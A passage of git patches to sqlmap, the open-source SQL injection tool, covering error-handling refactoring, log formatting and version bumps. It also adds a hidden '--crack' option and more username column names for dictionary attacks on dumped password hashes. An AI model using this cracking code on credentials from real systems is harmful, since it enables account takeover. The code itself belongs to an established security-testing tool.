excMsg for _ in ("scramble_caching_sha2", "TypeError")): - errMsg = "please downgrade the 'PyMySQL' package (=< 0.8.1) " - errMsg += "(Reference: https://github.com/PyMySQL/PyMySQL/issues/700)" - logger.critical(errMsg) - raise SystemExit - - elif "must be pinned buffer, not bytearray" in excMsg: - errMsg = "error occurred at Python interpreter which " - errMsg += "is fixed in 2.7.x. Please update accordingly " - errMsg += "(Reference: https://bugs.python.org/issue8104)" - logger.critical(errMsg) - raise SystemExit - - elif "can't start new thread" in excMsg: - errMsg = "there has been a problem while creating new thread instance. " - errMsg += "Please make sure that you are not running too many processes" - if not IS_WIN: - errMsg += " (or increase the 'ulimit -u' value)" - logger.critical(errMsg) - raise SystemExit - - elif "'DictObject' object has no attribute '" in excMsg and all(_ in errMsg for _ in ("(fingerprinted)", "(identified)")): - errMsg = "there has been a problem in enumeration. " - errMsg += "Because of a considerable chance of false-positive case " - errMsg += "you are advised to rerun with switch '--flush-session'" - logger.critical(errMsg) - raise SystemExit - - elif all(_ in excMsg for _ in ("pymysql", "configparser")): - errMsg = "wrong initialization of pymsql detected (using Python3 dependencies)" - logger.critical(errMsg) - raise SystemExit - - elif "bad marshal data (unknown type code)" in excMsg: - match = re.search(r"\s*(.+)\s+ValueError", excMsg) - errMsg = "one of your .pyc files are corrupted%s" % (" ('%s')" % match.group(1) if match else "") - errMsg += ". Please delete .pyc files on your system to fix the problem" - logger.critical(errMsg) - raise SystemExit - - elif kb.get("dumpKeyboardInterrupt"): - raise SystemExit - - elif any(_ in excMsg for _ in ("Broken pipe",)): - raise SystemExit - - for match in re.finditer(r'File "(.+?)", line', excMsg): - file_ = match.group(1) - file_ = os.path.relpath(file_, os.path.dirname(__file__)) - file_ = file_.replace("\\", '/') - if "../" in file_: - file_ = re.sub(r"(\.\./)+", '/', file_) - else: - file_ = file_.lstrip('/') - file_ = re.sub(r"/{2,}", '/', file_) - excMsg = excMsg.replace(match.group(1), file_) + if valid is False: + errMsg = "code integrity check failed (turning off automatic issue creation). " + errMsg += "You should retrieve the latest development version from official GitHub " + errMsg += "repository at '%s'" % GIT_PAGE + logger.critical(errMsg) + print + dataToStdout(excMsg) + raise SystemExit + + elif any(_ in excMsg for _ in ("tamper/", "waf/")): + logger.critical(errMsg) + print + dataToStdout(excMsg) + raise SystemExit + + elif any(_ in excMsg for _ in ("ImportError", "Can't find file for module")): + errMsg = "invalid runtime environment ('%s')" % excMsg.split("Error: ")[-1].strip() + logger.critical(errMsg) + raise SystemExit + + elif "MemoryError" in excMsg: + errMsg = "memory exhaustion detected" + logger.critical(errMsg) + raise SystemExit + + elif any(_ in excMsg for _ in ("No space left", "Disk quota exceeded")): + errMsg = "no space left on output device" + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("No such file", "_'", "self.get_prog_name()")): + errMsg = "corrupted installation detected ('%s'). " % excMsg.strip().split('\n')[-1] + errMsg += "You should retrieve the latest development version from official GitHub " + errMsg += "repository at '%s'" % GIT_PAGE + logger.critical(errMsg) + raise SystemExit + + elif "Read-only file system" in excMsg: + errMsg = "output device is mounted as read-only" + logger.critical(errMsg) + raise SystemExit + + elif "OperationalError: disk I/O error" in excMsg: + errMsg = "I/O error on output device" + logger.critical(errMsg) + raise SystemExit - errMsg = maskSensitiveData(errMsg) - excMsg = maskSensitiveData(excMsg) + elif "Violation of BIDI" in excMsg: + errMsg = "invalid URL (violation of Bidi IDNA rule - RFC 5893)" + logger.critical(errMsg) + raise SystemExit + + elif "_mkstemp_inner" in excMsg: + errMsg = "there has been a problem while accessing temporary files" + logger.critical(errMsg) + raise SystemExit - if conf.get("api") or not valid: - logger.critical("%s\n%s" % (errMsg, excMsg)) + elif all(_ in excMsg for _ in ("twophase", "sqlalchemy")): + errMsg = "please update the 'sqlalchemy' package (>= 1.1.11) " + errMsg += "(Reference: https://qiita.com/tkprof/items/7d7b2d00df9c5f16fffe)" + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("scramble_caching_sha2", "TypeError")): + errMsg = "please downgrade the 'PyMySQL' package (=< 0.8.1) " + errMsg += "(Reference: https://github.com/PyMySQL/PyMySQL/issues/700)" + logger.critical(errMsg) + raise SystemExit + + elif "must be pinned buffer, not bytearray" in excMsg: + errMsg = "error occurred at Python interpreter which " + errMsg += "is fixed in 2.7.x. Please update accordingly " + errMsg += "(Reference: https://bugs.python.org/issue8104)" + logger.critical(errMsg) + raise SystemExit + + elif "can't start new thread" in excMsg: + errMsg = "there has been a problem while creating new thread instance. " + errMsg += "Please make sure that you are not running too many processes" + if not IS_WIN: + errMsg += " (or increase the 'ulimit -u' value)" + logger.critical(errMsg) + raise SystemExit + + elif "'DictObject' object has no attribute '" in excMsg and all(_ in errMsg for _ in ("(fingerprinted)", "(identified)")): + errMsg = "there has been a problem in enumeration. " + errMsg += "Because of a considerable chance of false-positive case " + errMsg += "you are advised to rerun with switch '--flush-session'" + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("pymysql", "configparser")): + errMsg = "wrong initialization of pymsql detected (using Python3 dependencies)" + logger.critical(errMsg) + raise SystemExit + + elif "bad marshal data (unknown type code)" in excMsg: + match = re.search(r"\s*(.+)\s+ValueError", excMsg) + errMsg = "one of your .pyc files are corrupted%s" % (" ('%s')" % match.group(1) if match else "") + errMsg += ". Please delete .pyc files on your system to fix the problem" + logger.critical(errMsg) + raise SystemExit + + elif kb.get("dumpKeyboardInterrupt"): + raise SystemExit + + elif any(_ in excMsg for _ in ("Broken pipe",)): + raise SystemExit + + for match in re.finditer(r'File "(.+?)", line', excMsg): + file_ = match.group(1) + file_ = os.path.relpath(file_, os.path.dirname(__file__)) + file_ = file_.replace("\\", '/') + if "../" in file_: + file_ = re.sub(r"(\.\./)+", '/', file_) else: - logger.critical(errMsg) - kb.stickyLevel = logging.CRITICAL - dataToStdout(excMsg) - createGithubIssue(errMsg, excMsg) + file_ = file_.lstrip('/') + file_ = re.sub(r"/{2,}", '/', file_) + excMsg = excMsg.replace(match.group(1), file_) + + errMsg = maskSensitiveData(errMsg) + excMsg = maskSensitiveData(excMsg) - except KeyboardInterrupt: - pass + if conf.get("api") or not valid: + logger.critical("%s\n%s" % (errMsg, excMsg)) + else: + logger.critical(errMsg) + kb.stickyLevel = logging.CRITICAL + dataToStdout(excMsg) + createGithubIssue(errMsg, excMsg) finally: kb.threadContinue = False @@ -366,45 +354,39 @@ def main(): shutil.rmtree(kb.tempDir, ignore_errors=True) if conf.get("hashDB"): - try: - conf.hashDB.flush(True) - except KeyboardInterrupt: - pass + conf.hashDB.flush(True) if conf.get("harFile"): with openFile(conf.harFile, "w+b") as f: json.dump(conf.httpCollector.obtain(), fp=f, indent=4, separators=(',', ': ')) if conf.get("api"): - try: - conf.databaseCursor.disconnect() - except KeyboardInterrupt: - pass + conf.databaseCursor.disconnect() if conf.get("dumper"): conf.dumper.flush() # short delay for thread finalization - try: - _ = time.time() - while threading.activeCount() > 1 and (time.time() - _) > THREAD_FINALIZATION_TIMEOUT: - time.sleep(0.01) - - if cmdLineOptions.get("sqlmapShell"): - cmdLineOptions.clear() - conf.clear() - kb.clear() - conf.disableBanner = True - main() - except KeyboardInterrupt: - pass - finally: - # Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program - if threading.activeCount() > 1: - os._exit(0) + _ = time.time() + while threading.activeCount() > 1 and (time.time() - _) > THREAD_FINALIZATION_TIMEOUT: + time.sleep(0.01) + + if cmdLineOptions.get("sqlmapShell"): + cmdLineOptions.clear() + conf.clear() + kb.clear() + conf.disableBanner = True + main() if __name__ == "__main__": - main() + try: + main() + except KeyboardInterrupt: + pass + finally: + # Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program + if threading.activeCount() > 1: + os._exit(0) else: # cancelling postponed imports (because of Travis CI checks) from lib.controller.controller import start diff --git a/txt/checksum.md5 b/txt/checksum.md5 index fbd90e7a636..0265695baa5 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -8e45f357b6d73d128267f3b66fe5e081 lib/core/settings.py +7d446786d9c7f49c591f382079d39787 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -234,7 +234,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ cd90da0474d7b1a67d7b40d208493375 sqlmapapi.py -55ba3999ab8819e0d34ca075d46fa9dd sqlmap.py +82f2326ec9cc8719859266f72c19f9b3 sqlmap.py 523dab9e1093eb59264c6beb366b255a tamper/0x2char.py 3a1697585ae4e7bf315e9dda97d6f321 tamper/apostrophemask.py d7a119a74be9b385ee3884fb5e6af041 tamper/apostrophenullencode.py From 4fe4c582c1ee6c9a43a0358bb7984008622bf686 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 17 Dec 2018 15:15:54 +0100 Subject: [PATCH 396/428] Minor output adjustments --- lib/core/settings.py | 2 +- lib/techniques/error/use.py | 2 +- lib/techniques/union/use.py | 2 +- txt/checksum.md5 | 6 +++--- 4 files changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 68a6b924483..d80bb3afe8f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.22" +VERSION = "1.2.12.23" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py index 76f2e84b412..c252570b932 100644 --- a/lib/techniques/error/use.py +++ b/lib/techniques/error/use.py @@ -244,7 +244,7 @@ def _errorFields(expression, expressionFields, expressionFieldsList, num=None, e if kb.fileReadMode and output and output.strip(): print elif output is not None and not (threadData.resumed and kb.suppressResumeInfo) and not (emptyFields and field in emptyFields): - status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", output if kb.safeCharEncode else safecharencode(output)) + status = "[%s] [INFO] %s: '%s'" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", output if kb.safeCharEncode else safecharencode(output)) if len(status) > width: status = "%s..." % status[:width - 3] diff --git a/lib/techniques/union/use.py b/lib/techniques/union/use.py index 7e68fb2d01b..49624d59c63 100644 --- a/lib/techniques/union/use.py +++ b/lib/techniques/union/use.py @@ -373,7 +373,7 @@ def unionThread(): del threadData.shared.buffered[0] if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo) and not threadData.shared.showEta: - _ = ','.join("\"%s\"" % _ for _ in flattenValue(arrayizeValue(items))) if not isinstance(items, basestring) else items + _ = ','.join("'%s'" % _ for _ in (flattenValue(arrayizeValue(items)) if not isinstance(items, basestring) else [items])) status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", _ if kb.safeCharEncode else safecharencode(_)) if len(status) > width: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 0265695baa5..bb733044c27 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -7d446786d9c7f49c591f382079d39787 lib/core/settings.py +1cf1beb635623adec866df474cebc88c lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -96,11 +96,11 @@ db208ab47de010836c6bf044e2357861 lib/techniques/blind/inference.py 799faf9008527d2e9da9d923e50f685a lib/techniques/dns/test.py 48a24f48da791e67309003fd5e8428cb lib/techniques/dns/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/error/__init__.py -214d916bb8b456ae698ca0f5523186ff lib/techniques/error/use.py +686904374067047b521151301321b30a lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py f7813cdee00df8f98d6f811475e520a1 lib/techniques/union/test.py -dbddd178a6ca941fa745d9b3edbb979b lib/techniques/union/use.py +1f2ff182a28b2baf9f9fe7477c76618d lib/techniques/union/use.py 038ec99105c59acc2b1c6cb90e9e4043 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py 31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py From 1e508547d833f0b758f781e4475c84a189f5a523 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 17 Dec 2018 16:08:14 +0100 Subject: [PATCH 397/428] Trivial console output update --- lib/core/settings.py | 2 +- lib/utils/api.py | 30 +++++++++++++++--------------- txt/checksum.md5 | 4 ++-- 3 files changed, 18 insertions(+), 18 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index d80bb3afe8f..cb38dac665f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.23" +VERSION = "1.2.12.24" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/api.py b/lib/utils/api.py index 05f39e879e7..ed97128aadd 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -376,7 +376,7 @@ def task_delete(taskid): if taskid in DataStore.tasks: DataStore.tasks.pop(taskid) - logger.debug("[%s] Deleted task" % taskid) + logger.debug("(%s) Deleted task" % taskid) return jsonize({"success": True}) else: response.status = 404 @@ -399,7 +399,7 @@ def task_list(token=None): if is_admin(token) or DataStore.tasks[key].remote_addr == request.remote_addr: tasks[key] = dejsonize(scan_status(key))["status"] - logger.debug("[%s] Listed task pool (%s)" % (token, "admin" if is_admin(token) else request.remote_addr)) + logger.debug("(%s) Listed task pool (%s)" % (token, "admin" if is_admin(token) else request.remote_addr)) return jsonize({"success": True, "tasks": tasks, "tasks_num": len(tasks)}) @get("/admin/flush") @@ -414,7 +414,7 @@ def task_flush(token=None): DataStore.tasks[key].engine_kill() del DataStore.tasks[key] - logger.debug("[%s] Flushed task pool (%s)" % (token, "admin" if is_admin(token) else request.remote_addr)) + logger.debug("(%s) Flushed task pool (%s)" % (token, "admin" if is_admin(token) else request.remote_addr)) return jsonize({"success": True}) ################################## @@ -431,7 +431,7 @@ def option_list(taskid): logger.warning("[%s] Invalid task ID provided to option_list()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) - logger.debug("[%s] Listed task options" % taskid) + logger.debug("(%s) Listed task options" % taskid) return jsonize({"success": True, "options": DataStore.tasks[taskid].get_options()}) @post("/option//get") @@ -450,10 +450,10 @@ def option_get(taskid): if option in DataStore.tasks[taskid].options: results[option] = DataStore.tasks[taskid].options[option] else: - logger.debug("[%s] Requested value for unknown option '%s'" % (taskid, option)) + logger.debug("(%s) Requested value for unknown option '%s'" % (taskid, option)) return jsonize({"success": False, "message": "Unknown option '%s'" % option}) - logger.debug("[%s] Retrieved values for option(s) '%s'" % (taskid, ",".join(options))) + logger.debug("(%s) Retrieved values for option(s) '%s'" % (taskid, ",".join(options))) return jsonize({"success": True, "options": results}) @@ -474,7 +474,7 @@ def option_set(taskid): for option, value in request.json.items(): DataStore.tasks[taskid].set_option(option, value) - logger.debug("[%s] Requested to set options" % taskid) + logger.debug("(%s) Requested to set options" % taskid) return jsonize({"success": True}) # Handle scans @@ -499,7 +499,7 @@ def scan_start(taskid): # Launch sqlmap engine in a separate process DataStore.tasks[taskid].engine_start() - logger.debug("[%s] Started scan" % taskid) + logger.debug("(%s) Started scan" % taskid) return jsonize({"success": True, "engineid": DataStore.tasks[taskid].engine_get_id()}) @get("/scan//stop") @@ -514,7 +514,7 @@ def scan_stop(taskid): DataStore.tasks[taskid].engine_stop() - logger.debug("[%s] Stopped scan" % taskid) + logger.debug("(%s) Stopped scan" % taskid) return jsonize({"success": True}) @get("/scan//kill") @@ -529,7 +529,7 @@ def scan_kill(taskid): DataStore.tasks[taskid].engine_kill() - logger.debug("[%s] Killed scan" % taskid) + logger.debug("(%s) Killed scan" % taskid) return jsonize({"success": True}) @get("/scan//status") @@ -547,7 +547,7 @@ def scan_status(taskid): else: status = "terminated" if DataStore.tasks[taskid].engine_has_terminated() is True else "running" - logger.debug("[%s] Retrieved scan status" % taskid) + logger.debug("(%s) Retrieved scan status" % taskid) return jsonize({ "success": True, "status": status, @@ -575,7 +575,7 @@ def scan_data(taskid): for error in DataStore.current_db.execute("SELECT error FROM errors WHERE taskid = ? ORDER BY id ASC", (taskid,)): json_errors_message.append(error) - logger.debug("[%s] Retrieved scan data and error messages" % taskid) + logger.debug("(%s) Retrieved scan data and error messages" % taskid) return jsonize({"success": True, "data": json_data_message, "error": json_errors_message}) # Functions to handle scans' logs @@ -602,7 +602,7 @@ def scan_log_limited(taskid, start, end): for time_, level, message in DataStore.current_db.execute("SELECT time, level, message FROM logs WHERE taskid = ? AND id >= ? AND id <= ? ORDER BY id ASC", (taskid, start, end)): json_log_messages.append({"time": time_, "level": level, "message": message}) - logger.debug("[%s] Retrieved scan log messages subset" % taskid) + logger.debug("(%s) Retrieved scan log messages subset" % taskid) return jsonize({"success": True, "log": json_log_messages}) @get("/scan//log") @@ -621,7 +621,7 @@ def scan_log(taskid): for time_, level, message in DataStore.current_db.execute("SELECT time, level, message FROM logs WHERE taskid = ? ORDER BY id ASC", (taskid,)): json_log_messages.append({"time": time_, "level": level, "message": message}) - logger.debug("[%s] Retrieved scan log messages" % taskid) + logger.debug("(%s) Retrieved scan log messages" % taskid) return jsonize({"success": True, "log": json_log_messages}) # Function to handle files inside the output directory @@ -642,7 +642,7 @@ def download(taskid, target, filename): return jsonize({"success": False, "message": "Forbidden path"}) if os.path.isfile(path): - logger.debug("[%s] Retrieved content of file %s" % (taskid, target)) + logger.debug("(%s) Retrieved content of file %s" % (taskid, target)) with open(path, 'rb') as inf: file_content = inf.read() return jsonize({"success": True, "file": base64encode(file_content)}) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index bb733044c27..f9d45cb49e4 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -1cf1beb635623adec866df474cebc88c lib/core/settings.py +b82a5d34d68888945c51c84810d4d4b3 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -101,7 +101,7 @@ db208ab47de010836c6bf044e2357861 lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py f7813cdee00df8f98d6f811475e520a1 lib/techniques/union/test.py 1f2ff182a28b2baf9f9fe7477c76618d lib/techniques/union/use.py -038ec99105c59acc2b1c6cb90e9e4043 lib/utils/api.py +fd1ede20ec674518a54966eaf0c9f8c6 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py 31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py f9867bbfcd6d31916ca73e72e95fd881 lib/utils/deps.py From b288bfdbc318327f092113375f3a5d8a58ffd678 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 17 Dec 2018 17:03:51 +0100 Subject: [PATCH 398/428] Minor update --- lib/core/settings.py | 4 ++-- lib/utils/hash.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index cb38dac665f..70f62b8b7d5 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.24" +VERSION = "1.2.12.25" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -585,7 +585,7 @@ UNENCODED_ORIGINAL_VALUE = "original" # Common column names containing usernames (used for hash cracking in some cases) -COMMON_USER_COLUMNS = ("login", "user", "username", "user_name", "user_login", "benutzername", "benutzer", "utilisateur", "usager", "consommateur", "utente", "utilizzatore", "usufrutuario", "korisnik", "usuario", "consumidor", "client", "cuser") +COMMON_USER_COLUMNS = ("login", "user", "username", "user_name", "user_login", "benutzername", "benutzer", "utilisateur", "usager", "consommateur", "utente", "utilizzatore", "utilizator", "utilizador", "usufrutuario", "korisnik", "uporabnik", "usuario", "consumidor", "client", "cuser") # Default delimiter in GET/POST values DEFAULT_GET_POST_DELIMITER = '&' diff --git a/lib/utils/hash.py b/lib/utils/hash.py index 05cd2a817c4..e6381d58ac5 100644 --- a/lib/utils/hash.py +++ b/lib/utils/hash.py @@ -623,7 +623,7 @@ def attackDumpedTable(): col_passwords = set() attack_dict = {} - for column in columns: + for column in sorted(columns, key=lambda _: len(_), reverse=True): if column and column.lower() in COMMON_USER_COLUMNS: col_user = column break diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f9d45cb49e4..b253cf02f26 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -b82a5d34d68888945c51c84810d4d4b3 lib/core/settings.py +3805f9f360e47798a3e6d4da977c83eb lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -108,7 +108,7 @@ f9867bbfcd6d31916ca73e72e95fd881 lib/utils/deps.py f7af65aa47329d021e2b2cc8521b42a4 lib/utils/getch.py 7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py 1205648d55649accafae2cc77d647aa0 lib/utils/hashdb.py -d0f4d56c5d6a09a4635035e233d4a782 lib/utils/hash.py +4b50c02e803c874c1d03873fd29d63ee lib/utils/hash.py 011d2dbf589e0faa0deca61a651239cc lib/utils/htmlentities.py 1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py 527409077a094b63c88f3291138b1c81 lib/utils/pivotdumptable.py From 01d5da18e3ffe547694c337b5a0e0d34061d908f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 17 Dec 2018 17:38:47 +0100 Subject: [PATCH 399/428] Adding experimental option --crack --- lib/controller/controller.py | 4 ++++ lib/core/common.py | 16 ++++++++++------ lib/core/settings.py | 2 +- lib/parse/cmdline.py | 6 +++++- lib/utils/hash.py | 28 +++++++++++++++++++++++----- txt/checksum.md5 | 10 +++++----- 6 files changed, 48 insertions(+), 18 deletions(-) diff --git a/lib/controller/controller.py b/lib/controller/controller.py index 864ea91c9cc..cc9646079c7 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -71,6 +71,7 @@ from lib.core.settings import USER_AGENT_ALIASES from lib.core.target import initTargetEnv from lib.core.target import setupTargetEnv +from lib.utils.hash import crackHashFile def _selectInjection(): """ @@ -268,6 +269,9 @@ def start(): check if they are dynamic and SQL injection affected """ + if conf.hashFile: + crackHashFile(conf.hashFile) + if conf.direct: initTargetEnv() setupTargetEnv() diff --git a/lib/core/common.py b/lib/core/common.py index 669288576ca..d0fd775b8b0 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -4343,19 +4343,23 @@ def hashDBWrite(key, value, serialize=False): Helper function for writing session data to HashDB """ - _ = '|'.join((str(_) if not isinstance(_, basestring) else _) for _ in (conf.hostname, conf.path.strip('/') if conf.path is not None else conf.port, key, HASHDB_MILESTONE_VALUE)) - conf.hashDB.write(_, value, serialize) + if conf.hashDB: + _ = '|'.join((str(_) if not isinstance(_, basestring) else _) for _ in (conf.hostname, conf.path.strip('/') if conf.path is not None else conf.port, key, HASHDB_MILESTONE_VALUE)) + conf.hashDB.write(_, value, serialize) def hashDBRetrieve(key, unserialize=False, checkConf=False): """ Helper function for restoring session data from HashDB """ - _ = '|'.join((str(_) if not isinstance(_, basestring) else _) for _ in (conf.hostname, conf.path.strip('/') if conf.path is not None else conf.port, key, HASHDB_MILESTONE_VALUE)) - retVal = conf.hashDB.retrieve(_, unserialize) if kb.resumeValues and not (checkConf and any((conf.flushSession, conf.freshQueries))) else None + retVal = None + + if conf.hashDB: + _ = '|'.join((str(_) if not isinstance(_, basestring) else _) for _ in (conf.hostname, conf.path.strip('/') if conf.path is not None else conf.port, key, HASHDB_MILESTONE_VALUE)) + retVal = conf.hashDB.retrieve(_, unserialize) if kb.resumeValues and not (checkConf and any((conf.flushSession, conf.freshQueries))) else None - if not kb.inferenceMode and not kb.fileReadMode and isinstance(retVal, basestring) and any(_ in retVal for _ in (PARTIAL_VALUE_MARKER, PARTIAL_HEX_VALUE_MARKER)): - retVal = None + if not kb.inferenceMode and not kb.fileReadMode and isinstance(retVal, basestring) and any(_ in retVal for _ in (PARTIAL_VALUE_MARKER, PARTIAL_HEX_VALUE_MARKER)): + retVal = None return retVal diff --git a/lib/core/settings.py b/lib/core/settings.py index 70f62b8b7d5..ab5adcf73e2 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.25" +VERSION = "1.2.12.26" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 2c867b88e35..9cc4d847cd3 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -668,6 +668,10 @@ def cmdLineParser(argv=None): help="Simple wizard interface for beginner users") # Hidden and/or experimental options + parser.add_option("--crack", dest="hashFile", + help=SUPPRESS_HELP) + #help="Load and crack hashes from a file") + parser.add_option("--dummy", dest="dummy", action="store_true", help=SUPPRESS_HELP) @@ -884,7 +888,7 @@ def _(self, *args): if args.dummy: args.url = args.url or DUMMY_URL - if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, args.purge, args.sitemapUrl, args.listTampers)): + if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, args.purge, args.sitemapUrl, args.listTampers, args.hashFile)): errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --list-tampers, --wizard, --update, --purge or --dependencies). " errMsg += "Use -h for basic and -hh for advanced help\n" parser.error(errMsg) diff --git a/lib/utils/hash.py b/lib/utils/hash.py index e6381d58ac5..39e9b2ea13a 100644 --- a/lib/utils/hash.py +++ b/lib/utils/hash.py @@ -1078,7 +1078,8 @@ def dictionaryAttack(attack_dict): gc.enable() if retVal: - conf.hashDB.beginTransaction() + if conf.hashDB: + conf.hashDB.beginTransaction() while not retVal.empty(): user, hash_, word = item = retVal.get(block=False) @@ -1086,7 +1087,8 @@ def dictionaryAttack(attack_dict): hashDBWrite(hash_, word) results.append(item) - conf.hashDB.endTransaction() + if conf.hashDB: + conf.hashDB.endTransaction() clearConsoleLine() @@ -1171,15 +1173,17 @@ class Value(): if _multiprocessing: gc.enable() - if retVal: - conf.hashDB.beginTransaction() + if retVal and conf.hashDB: + if conf.hashDB: + conf.hashDB.beginTransaction() while not retVal.empty(): user, hash_, word = item = retVal.get(block=False) hashDBWrite(hash_, word) results.append(item) - conf.hashDB.endTransaction() + if conf.hashDB: + conf.hashDB.endTransaction() clearConsoleLine() @@ -1194,3 +1198,17 @@ class Value(): logger.warn(warnMsg) return results + +def crackHashFile(hashFile): + i = 0 + attack_dict = {} + + for line in getFileItems(conf.hashFile): + if ':' in line: + 